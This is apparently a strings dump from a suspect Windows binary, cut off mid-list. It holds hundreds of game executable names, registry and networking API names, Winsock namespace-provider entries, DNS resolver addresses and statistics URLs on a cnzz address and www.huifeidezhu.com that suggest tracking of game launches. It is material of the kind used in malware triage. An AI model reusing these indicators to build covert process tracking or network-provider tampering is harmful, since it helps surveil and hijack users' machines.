Stylin.exe</pre><pre>PuppyLuv.exe</pre><pre>PuppyPets.exe</pre><pre>PuzzleChronicles.exe</pre><pre>PuzzleHero.exe</pre><pre>PuzzleInlay.exe</pre><pre>PuzzleQuest2.exe</pre><pre>PuzzleRocks.exe</pre><pre>PuzzlingPaws.exe</pre><pre>Pyroblazer.exe</pre><pre>QBeez2.exe</pre><pre>QGLPatcherU.exe</pre><pre>qiangtandenglu2004.exe</pre><pre>QLJDTrans001.exe</pre><pre>Qoh98.exe</pre><pre>qqhxsj.exe</pre><pre>qqr2.exe</pre><pre>QQSpeedLauncher.exe</pre><pre>Questionaut.exe</pre><pre>qwc.exe</pre><pre>QYFOnline.exe</pre><pre>Qyj.exe</pre><pre>qyz.exe</pre><pre>fruits inc.exe</pre><pre>slt.exe</pre><pre>cloudland.exe</pre><pre>runespell.exe</pre><pre>magic_2012.exe</pre><pre>PeaceCraft3.exe</pre><pre>emily.exe</pre><pre>Dungeons of Dredmor.exe</pre><pre>BackToTheFuture105.exe</pre><pre>Pioneers.exe</pre><pre>facesCE.exe</pre><pre>MacabreMysteries_CotN.exe</pre><pre>Saving Private Sheep.exe</pre><pre>DJXOnline.exe</pre><pre>bayiqp.exe</pre><pre>panzercorps.exe</pre><pre>facece.exe</pre><pre>SUMMERBEACH.EXE</pre><pre>Treasure_Seekers-The_Time_Has_Come.exe</pre><pre>fotonica.exe</pre><pre>Maestro - Music of Death.exe</pre><pre>audyssey.exe</pre><pre>chantelise.exe</pre><pre>xjmx_launcher.exe</pre><pre>LauncherAss.exe</pre><pre>poolshark2.exe</pre><pre>SupremeRulerCW.exe</pre><pre>TGameLauncher.exe</pre><pre>GameLanders.exe</pre><pre>LaunchR.exe</pre><pre>886qipai.exe</pre><pre>r2.exe</pre><pre>r3win.exe</pre><pre>R7plus.exe</pre><pre>RA.exe</pre><pre>Ra2.exe</pre><pre>racing.exe</pre><pre>Raiden3.exe</pre><pre>Rail of War.exe</pre><pre>RailWorks.exe</pre><pre>RanchRush.exe</pre><pre>Ransom.exe</pre><pre>Raptor.exe</pre><pre>RAT.exe</pre><pre>Rats.exe</pre><pre>RavenShield.exe</pre><pre>RaymanM.exe</pre><pre>rayne.exe</pre><pre>RB2.exe</pre><pre>rct3.exe</pre><pre>re2.exe</pre><pre>reallive_CN.exe</pre><pre>RealPack-new.EXE</pre><pre>Rebound.exe</pre><pre>recettear.exe</pre><pre>recharge.exe</pre><pre>Red Alert.exe</pre><pre>redjets.exe</pre><pre>RedRiverLauncherc.exe</pre><pre>redtide.exe</pre><pre>Refuse home sweep home.exe</pre><pre>Release_CHI_Startup.exe</pre><pre>RepublicHeroesLauncher.exe</pre><pre>ResortingToDanger.exe</pre><pre>RestaurantEmpire.exe</pre><pre>Resurrection.exe</pre><pre>ReturnToRavenhearst.exe</pre><pre>revLoader.exe</pre><pre>rFactorLexus.exe</pre><pre>rfg_launcher.exe</pre><pre>richman.exe</pre><pre>RighteousKill2.exe</pre><pre>RIP.exe</pre><pre>rise.exe</pre><pre>RK.exe</pre><pre>rks CHN.exe</pre><pre>rmaniadeluxe.exe</pre><pre>Rmx4.exe</pre><pre>Roadrash2004.exe</pre><pre>roadworks.exe</pre><pre>roboFULL.exe</pre><pre>RoboGame.exe</pre><pre>Robots.exe</pre><pre>rockman.exe</pre><pre>ROCKMANX8.exe</pre><pre>RoClient.exe</pre><pre>Rolling_Spells.exe</pre><pre>Romance of Rome.exe</pre><pre>RomeGame.exe</pre><pre>RomeTW-BI.exe</pre><pre>Rooms.exe</pre><pre>RPG_RT.EXE</pre><pre>RTM_Fullscreen.exe</pre><pre>rtonline.exe</pre><pre>RubberNinjas.exe</pre><pre>RuLai.exe</pre><pre>RumbleCube.exe</pre><pre>run_game.exe</pre><pre>RunDict.exe</pre><pre>RunicOne.exe</pre><pre>RunMusicBox.exe</pre><pre>Ruse.exe</pre><pre>rush.exe</pre><pre>RW.exe</pre><pre>RXOnline.exe</pre><pre>RYUKI2.EXE</pre><pre>S16811.exe</pre><pre>s2_launcher.exe</pre><pre>S2DNG.exe</pre><pre>s3tdl.exe</pre><pre>s4.exe</pre><pre>SaaYaa.exe</pre><pre>sab.exe</pre><pre>safeboxTray.exe</pre><pre>saiban1.exe</pre><pre>Saints Row2.exe</pre><pre>Saira.exe</pre><pre>Sakura2.exe</pre><pre>sakura4.exe</pre><pre>SallysQuickClips.exe</pre><pre>SallysSalon.exe</pre><pre>Samantha Swift and the Golden Touch.exe</pre><pre>Samorost2.exe</pre><pre>Samurai II.exe</pre><pre>Samurai.exe</pre><pre>SAN10PK.exe</pre><pre>San11.exe</pre><pre>SAN3.EXE</pre><pre>San5W95.exe</pre><pre>SAN6.EXE</pre><pre>San7.exe</pre><pre>SanaFcn2.exe</pre><pre>Sandwich-Shoppe.exe</pre><pre>Sango2.exe</pre><pre>SangoHero.exe</pre><pre>sanguozhanji1dai.exe</pre><pre>sanguozhanji2.exe</pre><pre>sanguozhi2.exe</pre><pre>SAQ_JPOCR.exe</pre><pre>Saw Blaster.exe</pre><pre>SB6.exe</pre><pre>Sbk2011.exe</pre><pre>Scar.exe</pre><pre>scared.exe</pre><pre>SCDALauncher.exe</pre><pre>ScienceGirls.exe</pre><pre>ScourgeGame.exe</pre><pre>SCRABBLE Tour.exe</pre><pre>Scratch_it.exe</pre><pre>scrubbles.exe</pre><pre>SCSDestinations.exe</pre><pre>SDOnline.exe</pre><pre>SeasonMatch2.exe</pre><pre>secondsight.EXE</pre><pre>Secret Maryo Chronicles.exe</pre><pre>sengoku.exe</pre><pre>SeriousLauncher.exe</pre><pre>SevenKingdomsConquest.exe</pre><pre>SF2.exe</pre><pre>SFGSoccer.exe</pre><pre>sg.exe</pre><pre>SG7.exe</pre><pre>sgs_start.exe</pre><pre>Shade.exe</pre><pre>ShadowClones.exe</pre><pre>shaman.exe</pre><pre>Shamanville.exe</pre><pre>ShanChiR.exe</pre><pre>shank.exe</pre><pre>ShaoLinSoccer.exe</pre><pre>Shatter.exe</pre><pre>shell.exe</pre><pre>Shell_2008.exe</pre><pre>shenji2.exe</pre><pre>SHGames.exe</pre><pre>shift.exe</pre><pre>shiki.exe</pre><pre>shiki2.exe</pre><pre>shinanrenxia100ceng.exe</pre><pre>ShippingPC-SanctumGame.exe</pre><pre>ShippingPC-StormGame.exe</pre><pre>ShogunW.exe</pre><pre>Shopmania.exe</pre><pre>ShotOnline.exe</pre><pre>SHPatcher.exe</pre><pre>shubiaodianjiqi.exe</pre><pre>SiL.exe</pre><pre>silkroad.exe</pre><pre>SimCity 4.exe</pre><pre>sinagame.exe</pre><pre>sinashell.exe</pre><pre>SinaShow.exe</pre><pre>SinaUC.exe</pre><pre>Sincere.exe</pre><pre>SinsofaSolarEmpire.exe</pre><pre>skating.exe</pre><pre>SkiResortMogul.exe</pre><pre>Skull_Daddy_Demo_1.0.exe</pre><pre>Sky Taxi.exe</pre><pre>SkyAces1918.exe</pre><pre>skype.exe</pre><pre>Slash.exe</pre><pre>SlingoMystery.exe</pre><pre>SlingoQuest.exe</pre><pre>smash.exe</pre><pre>SmashingToys.exe</pre><pre>Smileyville.exe</pre><pre>smskb.exe</pre><pre>sndafw.exe</pre><pre>snes9x.exe</pre><pre>SNes9XW.exe</pre><pre>snip.exe</pre><pre>Snood.exe</pre><pre>Snowbao.exe</pre><pre>Snowblind.exe</pre><pre>Snowboard.exe</pre><pre>snowcat.exe</pre><pre>sntrmCN.exe</pre><pre>SoccerBashi.exe</pre><pre>soffice.exe</pre><pre>SoL_IGF.exe</pre><pre>Solace.exe</pre><pre>SoldnerX.exe</pre><pre>Solfege.exe</pre><pre>som.exe</pre><pre>sonic.exe</pre><pre>soreagain.exe</pre><pre>Soro_Win.exe</pre><pre>SorR.exe</pre><pre>Soulbringer.exe</pre><pre>Spa_Mania2.exe</pre><pre>SpaceBubbles.exe</pre><pre>SpazGame.exe</pre><pre>Spectraball.exe</pre><pre>splayer.exe</pre><pre>SplinterCell2.exe</pre><pre>SplitSecond.exe</pre><pre>Spongebob Bubble Rush.exe</pre><pre>SporeSporeApp.exe</pre><pre>spring.exe</pre><pre>SpringUpHarmony.exe</pre><pre>Sprouts_Adventure.exe</pre><pre>SPYX8Game.exe</pre><pre>SQ2012.exe</pre><pre>SquareLogic.exe</pre><pre>SRS.exe</pre><pre>ss3demo.exe</pre><pre>Ssa1.exe</pre><pre>ssLogin.exe</pre><pre>SSS2.exe</pre><pre>StarCraft II.exe</pre><pre>StarDefender2.exe</pre><pre>Staropen.exe</pre><pre>StarpointGemini.exe</pre><pre>starry.exe</pre><pre>StarsRestaurant.EXE</pre><pre>start hl2.exe</pre><pre>Starter.exe</pre><pre>startgame.exe</pre><pre>StartPhoebe.exe</pre><pre>StarTrekDAC.exe</pre><pre>StarTrigon.exe</pre><pre>State of War - Warmonger.exe</pre><pre>State of War.exe</pre><pre>Stateshift.exe</pre><pre>Steam.exe</pre><pre>SteamBrigade.exe</pre><pre>SteveTheSheriff.exe</pre><pre>StilllifeCH.exe</pre><pre>StoneAge.exe</pre><pre>story-of-dragons.exe</pre><pre>StreetFighter.exe</pre><pre>StrikeBall2.exe</pre><pre>strikeball3.exe</pre><pre>StuntMANIA_412_Win.exe</pre><pre>styrateg.exe</pre><pre>SubTerra.exe</pre><pre>Subvein.exe</pre><pre>SuccessStory.exe</pre><pre>sudokuball.exe</pre><pre>SumeaSkiJump(TM).exe</pre><pre>summerathletics2009.exe</pre><pre>SUN.exe</pre><pre>Sunshine.exe</pre><pre>sup.exe</pre><pre>Super_Granny_5.exe</pre><pre>Super_Smasher.exe</pre><pre>SUPER8-A.EXE</pre><pre>SuperLaserRacer.exe</pre><pre>SuperMeatBoy.exe</pre><pre>SuperStunt.exe</pre><pre>supertux.exe</pre><pre>SupremeCommander2.exe</pre><pre>SVC PLUS.EXE</pre><pre>Sveerz.exe</pre><pre>swarm.exe</pre><pre>Swashbucklers.exe</pre><pre>swd.exe</pre><pre>Swd5.exe</pre><pre>SwdHC.exe</pre><pre>Swdmd.exe</pre><pre>Sweetopia_CH.exe</pre><pre>Switchball.exe</pre><pre>Swords and Soldiers Launcher.exe</pre><pre>swr.exe</pre><pre>SWTFU.exe</pre><pre>SWTFU2.exe</pre><pre>SWW5.EXE</pre><pre>sxonline.exe</pre><pre>Syberia2CH.exe</pre><pre>SZ.exe</pre><pre>T2.EXE</pre><pre>T2BOX.exe</pre><pre>T3.EXE</pre><pre>T3D.exe</pre><pre>T58.exe</pre><pre>TAGAP.exe</pre><pre>TAIK2W95.exe</pre><pre>taikou3.exe</pre><pre>taikou4.exe</pre><pre>Takeda 2.exe</pre><pre>talesrunner.exe</pre><pre>Talismania.exe</pre><pre>TangleBee.exe</pre><pre>Tantra.exe</pre><pre>taquake3.exe</pre><pre>Tartaros.exe</pre><pre>tastyplanet.exe</pre><pre>Tba.exe</pre><pre>TeddyFactory.exe</pre><pre>Tennis.exe</pre><pre>TennisElbow.exe</pre><pre>tenshi.exe</pre><pre>Terrafarmers.exe</pre><pre>TeslaLegacy.exe</pre><pre>texun.exe</pre><pre>tezhongrenwu.exe</pre><pre>TFT.exe</pre><pre>TG.exe</pre><pre>th08.exe</pre><pre>th10.exe</pre><pre>The Bard's Tale Demo.exe</pre><pre>The Bard's Tale.exe</pre><pre>The Flower Shop.exe</pre><pre>The Inquisitor.exe</pre><pre>The Magicians Handbook 2.exe</pre><pre>The Moron Test.exe</pre><pre>The Network.exe</pre><pre>The Palace Builder.exe</pre><pre>The Settlers7.exe</pre><pre>The Spirit Engine 2.exe</pre><pre>The_Island_1.6.exe</pre><pre>TheBall.exe</pre><pre>TheBeginning.exe</pre><pre>TheBlackHeart.exe</pre><pre>TheClockworkMan.exe</pre><pre>TheClumsys2.exe</pre><pre>TheFall.exe</pre><pre>TheFallTrilogy.exe</pre><pre>TheJollyGangsSpookyAdventure.exe</pre><pre>TheMagicKey.exe</pre><pre>TheMaw.exe</pre><pre>TheUltimateChuchu.exe</pre><pre>ThinkTanks.exe</pre><pre>thotda.exe</pre><pre>tianchao.exe</pre><pre>tiandijie.exe</pre><pre>TianZi.exe</pre><pre>tib.exe</pre><pre>TibetQuest.exe</pre><pre>tibor.exe</pre><pre>Tien.exe</pre><pre>Tikibar.exe</pre><pre>TileQuest.exe</pre><pre>TimeOfWar.exe</pre><pre>Titan Quest.exe</pre><pre>TitanAssault.exe</pre><pre>TLauncher.exe</pre><pre>TMInc.exe</pre><pre>TMLauncher.exe</pre><pre>TMNT.exe</pre><pre>TNTBF.exe</pre><pre>tokitori.exe</pre><pre>Tom Clancy's EndWar Launcher.exe</pre><pre>tomb4 xp.exe</pre><pre>Tornado.exe</pre><pre>Tortuga-TwoTreasures.exe</pre><pre>tosui.exe</pre><pre>Totem Tribe Gold.exe</pre><pre>Totem Tribe.exe</pre><pre>totem_destroyer_deluxe.exe</pre><pre>TotemTribe.exe</pre><pre>ToW2.exe</pre><pre>Tower.exe</pre><pre>Townopolis.exe</pre><pre>tpw.exe</pre><pre>Tqit.exe</pre><pre>TRACTOR.EXE</pre><pre>Trading.exe</pre><pre>trafficgiant.exe</pre><pre>Trainz.exe</pre><pre>TraktorRacer.exe</pre><pre>TreasureHunter3.exe</pre><pre>treasureisland.exe</pre><pre>TreasureSeekersII.exe</pre><pre>TrialChallenge.exe</pre><pre>Trick or Travel.exe</pre><pre>TriJinx.exe</pre><pre>trlcn.exe</pre><pre>Tropical Dream.exe</pre><pre>TropicalFarm.exe</pre><pre>tropico3.exe</pre><pre>Tropix.exe</pre><pre>TROY.EXE</pre><pre>TRUETEARS.EXE</pre><pre>ts.exe</pre><pre>ts3client_win32.exe</pre><pre>TTH2Chs.exe</pre><pre>TTH2SPChs.exe</pre><pre>Tth3Chs.exe</pre><pre>TTHArpg.exe</pre><pre>TTraveler.exe</pre><pre>TU.exe</pre><pre>Tumblebugs.exe</pre><pre>TuPlay.exe</pre><pre>Tutorial.exe</pre><pre>TvsT.exe</pre><pre>TWFC.exe</pre><pre>twistingo.exe</pre><pre>TwistyTracks.exe</pre><pre>TWMJ_.exe</pre><pre>TWW.exe</pre><pre>TXWQ.exe</pre><pre>TYFrame.exe</pre><pre>TYJStartup.exe</pre><pre>TZYOL.exe</pre><pre>udk.exe</pre><pre>ufo.exe</pre><pre>uktrucks.exe</pre><pre>unpacked.exe</pre><pre>Unreal2.exe</pre><pre>UrbanOperations.exe</pre><pre>UserLogin.exe</pre><pre>UU Point.exe</pre><pre>UUCall.exe</pre><pre>UUSeePlayer.exe</pre><pre>VacationMogul.exe</pre><pre>valforce.exe</pre><pre>vampire.exe</pre><pre>VampireHunters.exe</pre><pre>VampireSaga.exe</pre><pre>Vancouver.exe</pre><pre>VB6.EXE</pre><pre>Vchange.exe</pre><pre>VCop2.exe</pre><pre>Venetica.exe</pre><pre>Venice.exe</pre><pre>VentureArctic.exe</pre><pre>Verge.exe</pre><pre>VHunter.exe</pre><pre>VietnamCN.exe</pre><pre>vikings.exe</pre><pre>Viriax.exe</pre><pre>virtua_tennis_pc.exe</pre><pre>Virtual Families.exe</pre><pre>Virtual Villagers - New Believers.exe</pre><pre>Virtual Villagers - The Secret City.exe</pre><pre>VirtualCity.exe</pre><pre>VirtualVillagers.exe</pre><pre>VirtualVillagers2.exe</pre><pre>VirtuaNES 0.92.exe</pre><pre>VirtuaNES.exe</pre><pre>VirtuaNESex.exe</pre><pre>VisualBoyAdvance(CN).exe</pre><pre>VisualBoyAdvance.exe</pre><pre>vLoader.exe</pre><pre>vmv2.exe</pre><pre>VOODOO95.EXE</pre><pre>voyagecentury.exe</pre><pre>VRzhanjing2.exe</pre><pre>VVVVVV.exe</pre><pre>Vyruz-start.exe</pre><pre>Wacky Zoo GP.exe</pre><pre>walkwithjack.exe</pre><pre>WallaceGromit101.exe</pre><pre>WallaceGromit104.exe</pre><pre>Wandering_Willows.exe</pre><pre>WangWang.exe</pre><pre>WantedGuns.exe</pre><pre>WanWan.exe</pre><pre>Warcraft II BNE.exe</pre><pre>Warlords.exe</pre><pre>WarShip.exe</pre><pre>warzone2100.exe</pre><pre>Webhead.exe</pre><pre>wedding-dash-ready-aim-love.exe</pre><pre>WeddingSalon.exe</pre><pre>wesnoth.exe</pre><pre>Westward.exe</pre><pre>WF.exe</pre><pre>WHITEDIAMOND2.EXE</pre><pre>WhoLauncher.exe</pre><pre>wic_cn.exe</pre><pre>Wik.exe</pre><pre>WildTribe.exe</pre><pre>WildWestRansom.exe</pre><pre>WillRock.exe</pre><pre>WinAlch.exe</pre><pre>WinAP.exe</pre><pre>WinC.exe</pre><pre>WIND4.exe</pre><pre>WindII.exe</pre><pre>Windosill.exe</pre><pre>wineim.exe</pre><pre>wineimuiserver.exe</pre><pre>WinSTe.exe</pre><pre>Winter Voices.exe</pre><pre>Winterbottom.exe</pre><pre>WinWT.exe</pre><pre>WIRE_CLI.EXE</pre><pre>WizHat.exe</pre><pre>WLOnline.exe</pre><pre>WLP3.exe</pre><pre>WMC3.exe</pre><pre>WolfSP.exe</pre><pre>Wonderburg.exe</pre><pre>Wonderland.exe</pre><pre>Wonders.exe</pre><pre>woodcutter.exe</pre><pre>woodcutter2011.exe</pre><pre>Wore.exe</pre><pre>WorldAdventure.exe</pre><pre>WorldMaster_F.exe</pre><pre>WorldMosaics4.exe</pre><pre>WormsReloaded.exe</pre><pre>WOTLauncher.exe</pre><pre>wrapple_3_0.exe</pre><pre>WSBK07.EXE</pre><pre>WSC2009.exe</pre><pre>wsc3.exe</pre><pre>wspy3D.exe</pre><pre>ww2.exe</pre><pre>WW2Game.exe</pre><pre>wwp.exe</pre><pre>x5.exe</pre><pre>xenjo_giant.exe</pre><pre>xenjo_iyoyo.exe</pre><pre>XianLogin.exe</pre><pre>XIII.exe</pre><pre>xinchangyewang.exe</pre><pre>xlonline.exe</pre><pre>xlqy2.exe</pre><pre>xmen.exe</pre><pre>xmoto.exe</pre><pre>XQWIZARD.EXE</pre><pre>XT.exe</pre><pre>xuezhanshanghaitan.exe</pre><pre>xy.exe</pre><pre>xy3launch.exe</pre><pre>xyjonline.exe</pre><pre>YarsRevenge.exe</pre><pre>yatelandisidejueqi.exe</pre><pre>ybtx.exe</pre><pre>YHGame.exe</pre><pre>Yosumin.exe</pre><pre>Youda_Curse.exe</pre><pre>YoudaMarina.exe</pre><pre>YoudaSurvivor2.exe</pre><pre>YourDoodlesAreBugged.exe</pre><pre>YS2_WIN.EXE</pre><pre>ysf_win.exe</pre><pre>YXGSClient.exe</pre><pre>YZOnline.exe</pre><pre>z5.exe</pre><pre>zc.exe</pre><pre>Zen.exe</pre><pre>Zero Count.exe</pre><pre>Zero.exe</pre><pre>Zeus.exe</pre><pre>zfs.exe</pre><pre>zg.exe</pre><pre>Zombie Bowl-O-Rama.exe</pre><pre>Zombie.exe</pre><pre>ZombieMurder.exe</pre><pre>ZombieShooter.exe</pre><pre>Zompocalypse_ep1.exe</pre><pre>ztmnt.exe</pre><pre>zuqiujingli2007.exe</pre><pre>Zzed.exe</pre><pre>2011.exe</pre><pre>8.exe</pre><pre>1.exe</pre><pre>tenka5.exe</pre><pre>v0.94.exe</pre><pre>X8.exe</pre><pre>v2.1.exe</pre><pre>2.EXE</pre><pre>2000.exe</pre><pre>60.exe</pre><pre>XP.exe</pre><pre>2005.exe</pre><pre>wing.exe</pre><pre>1.exe</pre><pre>OL.exe</pre><pre>_1.1.exe</pre><pre>V1.2.exe</pre><pre>1.EXE</pre><pre>4591.exe</pre><pre>3.0.exe</pre><pre>II.EXE</pre><pre>pp.exe</pre><pre>HappyBoom.exe</pre><pre>DisneyGame.exe</pre><pre>FarmingSimulator2011.exe</pre><pre>bsp.exe</pre><pre>sh2pc2.exe</pre><pre>TheIsland.exe</pre><pre>HOMEFRONT.exe</pre><pre>RedFactionArmageddon.exe</pre><pre>soshite.exe</pre><pre>Shogun2.exe</pre><pre>ERegCleaner.exe</pre><pre>avant.exe</pre><pre>tmshell.exe</pre><pre>.rsrc</pre><pre>a452c&^&#.a1243c) 1<,.Yacqf-Ag</pre><pre>MFC42.DLL</pre><pre>MSVCRT.dll</pre><pre>_acmdln</pre><pre>RegOpenKeyA</pre><pre>RegCreateKeyA</pre><pre>RegCreateKeyExA</pre><pre>RegOpenKeyExW</pre><pre>COMCTL32.dll</pre><pre>OLEAUT32.dll</pre><pre>MSVCP60.dll</pre><pre>HttpOpenRequestW</pre><pre>VERSION.dll</pre><pre>mswsock.dll</pre><pre>MsgDebugView</pre><pre>127.0.0.1</pre><pre>208.67.222.222</pre><pre>208.67.220.220</pre><pre>114.114.114.114</pre><pre>114.114.115.115</pre><pre>8.8.8.8</pre><pre>8.8.8.9</pre><pre>8.8.4.4</pre><pre>Shell.Dusn</pre><pre>_WINICOMSG_</pre><pre>_WINPOPMSG_</pre><pre>X %s %s</pre><pre>http://s14.cnzz.com/stat.php?id=4730427&web_id=4730427</pre><pre>HTTP/1.0</pre><pre>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)</pre><pre>ntdll.dll</pre><pre>ZwQueryValueKey</pre><pre>ZwOpenKey</pre><pre>%SystemRoot%\System32\mswsock.dll</pre><pre>Tcpip</pre><pre>SupportedNameSpace</pre><pre>%SystemRoot%\System32\winrnr.dll</pre><pre>%SystemRoot%\system32\mswsock.dll</pre><pre>%SystemRoot%\system32\rsvpsp.dll</pre><pre>|%SystemRoot%\system32\rsvpsp.dll</pre><pre>000000000011</pre><pre>000000000010</pre><pre>000000000009</pre><pre>000000000008</pre><pre>000000000007</pre><pre>000000000006</pre><pre>000000000005</pre><pre>000000000004</pre><pre>000000000003</pre><pre>000000000002</pre><pre>000000000001</pre><pre>GetExportProcAddress:X %s</pre><pre>GetExportProcAddress:X %d</pre><pre>/stat/game.php?type=</pre><pre>www.huifeidezhu.com</pre><pre>User32.dll</pre><pre>kernel32.dll</pre><pre>\ext\settings\{11f09afe-75ad-4e52-ab43-e09e9351ce17}</pre><pre>software\policies\microsoft\windows nt\dnsclient</pre><pre>dnsapi.dll</pre><pre>HttpAddRequestHeadersW</pre><pre>HttpAddRequestHeadersA</pre><pre>wininet.dll</pre><pre>ws2_32.dll</pre><pre>urlmon.dll</pre><pre>\StringFileInfo\xx\%s</pre><pre>6.0.2800.1106</pre><pre>6.00.2600.0000</pre><pre>6.00.2600.0000 (xpclient.010817-1148)</pre><pre>6.00.2737.800</pre><pre>6.00.2800.1106</pre><pre>6.00.2800.1106 (xpsp1.020828-1920)</pre><pre>6.00.2800.1400</pre><pre>6.00.2800.1485</pre><pre>6.00.2800.1496</pre><pre>6.00.2800.1603</pre><pre>6.00.2800.1607</pre><pre>6.00.2800.1611</pre><pre>6.00.2800.1615</pre><pre>6.00.2800.1617</pre><pre>6.00.2800.1623</pre><pre>6.00.2800.1627</pre><pre>6.00.2800.1632</pre><pre>6.00.2800.1644</pre><pre>6.00.2800.1649</pre><pre>6.00.2800.1650</pre><pre>6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)</pre><pre>6.00.2900.2518 (xpsp.040919-1030)</pre><pre>6.00.2900.2518 (xpsp_sp2_gdr.040919-1056)</pre><pre>6.00.2900.2577 (xpsp_sp2_gdr.041130-1729)</pre><pre>6.00.2900.2598 (xpsp.041130-1728)</pre><pre>6.00.2900.2627 (xpsp.050309-1719)</pre><pre>6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)</pre><pre>6.00.2900.2668 (xpsp.050430-1553)</pre><pre>6.00.2900.2668 (xpsp_sp2_gdr.050430-1553)</pre><pre>6.00.2900.2713 (xpsp.050702-1518)</pre><pre>6.00.2900.2713 (xpsp_sp2_gdr.050702-1513)</pre><pre>6.00.2900.2753 (xpsp.050902-1331)</pre><pre>6.00.2900.2781 (xpsp.051020-1728)</pre><pre>6.00.2900.2781 (xpsp_sp2_gdr.051020-1730)</pre><pre>6.00.2900.2823 (xpsp.060106-1527)</pre><pre>6.00.2900.2823 (xpsp_sp2_gdr.060106-1520)</pre><pre>6.00.2900.2861 (xpsp.060303-1528)</pre><pre>6.00.2900.2861 (xpsp_sp2_gdr.060303-1517)</pre><pre>6.00.2900.2904 (xpsp.060509-0230)</pre><pre>6.00.2900.2904 (xpsp_sp2_gdr.060509-0218)</pre><pre>6.00.2900.2937 (xpsp.060623-0011)</pre><pre>6.00.2900.2937 (xpsp_sp2_gdr.060623-0002)</pre><pre>6.00.2900.2995 (xpsp.060913-0019)</pre><pre>6.00.2900.2995 (xpsp_sp2_gdr.060913-0010)</pre><pre>6.00.2900.3020 (xpsp.061023-0222)</pre><pre>6.00.2900.3020 (xpsp_sp2_gdr.061023-0214)</pre><pre>6.00.2900.3059 (xpsp_sp2_gdr.070104-0050)</pre><pre>6.00.2900.3059 (xpsp_sp2_qfe.070104-0040)</pre><pre>6.00.2900.3086 (xpsp_sp2_gdr.070218-2314)</pre><pre>6.00.2900.3086 (xpsp_sp2_qfe.070218-2342)</pre><pre>6.00.2900.3121 (xpsp_sp2_gdr.070418-1302)</pre><pre>6.00.2900.3121 (xpsp_sp2_qfe.070418-1302)</pre><pre>6.00.2900.3164 (xpsp_sp2_gdr.070626-1259)</pre><pre>6.00.2900.3164 (xpsp_sp2_qfe.070626-1258)</pre><pre>6.00.2900.3199 (xpsp_sp2_gdr.070821-1257)</pre><pre>6.00.2900.3199 (xpsp_sp2_qfe.070821-1250)</pre><pre>6.00.2900.3231 (xpsp_sp2_gdr.071010-1320)</pre><pre>6.00.2900.3231 (xpsp_sp2_qfe.071010-1316)</pre><pre>6.00.2900.3268 (xpsp_sp2_gdr.071206-1518)</pre><pre>6.00.2900.3268 (xpsp_sp2_qfe.071206-1251)</pre><pre>6.00.2900.3300 (xpsp.080125-2028)</pre><pre>6.00.2900.3314 (xpsp_sp2_gdr.080215-1241)</pre><pre>6.00.2900.3314 (xpsp_sp2_qfe.080215-1242)</pre><pre>6.00.2900.3354 (xpsp_sp2_gdr.080417-1412)</pre><pre>6.00.2900.3354 (xpsp_sp2_qfe.080417-1416)</pre><pre>6.00.2900.3395 (xpsp_sp2_gdr.080623-1307)</pre><pre>6.00.2900.3395 (xpsp_sp2_qfe.080623-1318)</pre><pre>6.00.2900.3429 (xpsp_sp2_gdr.080819-1231)</pre><pre>6.00.2900.3429 (xpsp_sp2_qfe.080819-1244)</pre><pre>6.00.2900.3462 (xpsp_sp2_gdr.081015-1244)</pre><pre>6.00.2900.3462 (xpsp_sp2_qfe.081015-1657)</pre><pre>6.00.2900.3527 (xpsp_sp2_gdr.090219-1253)</pre><pre>6.00.2900.3527 (xpsp_sp2_qfe.090219-1311)</pre><pre>6.00.2900.3562 (xpsp_sp2_gdr.090427-1232)</pre><pre>6.00.2900.3562 (xpsp_sp2_qfe.090427-1240)</pre><pre>6.00.2900.3592 (xpsp_sp2_gdr.090622-1453)</pre><pre>6.00.2900.3592 (xpsp_sp2_qfe.090622-1503)</pre><pre>6.00.2900.3627 (xpsp_sp2_gdr.090918-1238)</pre><pre>6.00.2900.3627 (xpsp_sp2_qfe.090918-1245)</pre><pre>6.00.2900.3640 (xpsp_sp2_gdr.091027-1355)</pre><pre>6.00.2900.3640 (xpsp_sp2_qfe.091027-1402)</pre><pre>6.00.2900.3660 (xpsp_sp2_gdr.091216-1517)</pre><pre>6.00.2900.3660 (xpsp_sp2_qfe.091216-1705)</pre><pre>6.00.2900.3676 (xpsp_sp2_gdr.100225-1250)</pre><pre>6.00.2900.3676 (xpsp_sp2_qfe.100225-1434)</pre><pre>6.00.2900.3698 (xpsp_sp2_gdr.100416-1705)</pre><pre>6.00.2900.3698 (xpsp_sp2_qfe.100416-1708)</pre><pre>6.00.2900.5512 (xpsp.080413-2105)</pre><pre>6.00.2900.5583 (xpsp_sp3_gdr.080417-1430)</pre><pre>6.00.2900.5583 (xpsp_sp3_qfe.080417-1431)</pre><pre>6.00.2900.5626 (xpsp_sp3_gdr.080623-1315)</pre><pre>6.00.2900.5626 (xpsp_sp3_qfe.080623-1331)</pre><pre>6.00.2900.5659 (xpsp_sp3_gdr.080819-1237)</pre><pre>6.00.2900.5659 (xpsp_sp3_qfe.080819-1352)</pre><pre>6.00.2900.5694 (xpsp_sp3_gdr.081015-1312)</pre><pre>6.00.2900.5694 (xpsp_sp3_qfe.081015-1409)</pre><pre>6.00.2900.5764 (xpsp_sp3_gdr.090219-1240)</pre><pre>6.00.2900.5764 (xpsp_sp3_qfe.090219-1311)</pre><pre>6.00.2900.5803 (xpsp_sp3_gdr.090428-1325)</pre><pre>6.00.2900.5803 (xpsp_sp3_qfe.090428-1347)</pre><pre>6.00.2900.5835 (xpsp_sp3_gdr.090626-1535)</pre><pre>6.00.2900.5835 (xpsp_sp3_qfe.090626-1600)</pre><pre>6.00.2900.5880 (xpsp_sp3_gdr.090924-1438)</pre><pre>6.00.2900.5880 (xpsp_sp3_qfe.090924-1448)</pre><pre>6.00.2900.5897 (xpsp_sp3_gdr.091028-1650)</pre><pre>6.00.2900.5897 (xpsp_sp3_qfe.091028-1717)</pre><pre>6.00.2900.5921 (xpsp_sp3_gdr.091221-1718)</pre><pre>6.00.2900.5921 (xpsp_sp3_qfe.091221-1752)</pre><pre>6.00.2900.5945 (xpsp_sp3_gdr.100225-1251)</pre><pre>6.00.2900.5945 (xpsp_sp3_qfe.100225-1321)</pre><pre>6.00.2900.5969 (xpsp_sp3_gdr.100416-1716)</pre><pre>6.00.2900.5969 (xpsp_sp3_qfe.100416-1736)</pre><pre>6.00.2900.6003 (xpsp_sp3_gdr.100623-1635)</pre><pre>6.00.2900.6003 (xpsp_sp3_qfe.100623-1636)</pre><pre>6.00.2900.6036 (xpsp_sp3_gdr.100908-2023)</pre><pre>6.00.2900.6036 